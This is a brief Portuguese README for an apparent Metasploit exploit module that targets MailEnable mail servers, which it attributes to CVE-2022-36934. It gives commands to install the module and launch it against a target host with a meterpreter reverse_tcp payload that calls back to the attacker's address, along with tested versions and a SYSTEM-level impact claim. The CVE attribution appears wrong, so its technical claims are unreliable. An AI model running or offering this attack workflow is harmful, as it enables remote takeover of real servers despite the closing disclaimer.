
Módulo do Metasploit para bypass de autenticação e RCE no MailEnable CVE-2022-36934
Módulo do Metasploit para a vulnerabilidade de bypass de autenticação do MailEnable (CVE-2022-36934), que leva à execução remota de código.
cp modules/exploits/windows/smtp/mailenable_authbypass_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/smtp/
reload_all
use exploit/windows/smtp/mailenable_authbypass_rce set RHOSTS <target_ip> set LHOST <your_ip> set PAYLOAD windows/x64/meterpreter/reverse_tcp exploit
🎯 Testado em:
MailEnable Professional 10.25 Windows Server 2019 MailEnable Enterprise 10.30 Windows Server 2016
📝 Detalhes Técnicos:
Vulnerabilidade: Bypass de autenticação via sintaxe tipo SQLi em SMTP/POP3
Vetor de Ataque: Rede (portas 25/110)
Privilégios: Executa como conta de serviço do MailEnable (geralmente SYSTEM)
⚠️ Aviso Legal:
Esta ferramenta é apenas para testes autorizados. Nunca use contra sistemas que você não possui ou sem permissão explícita para testar.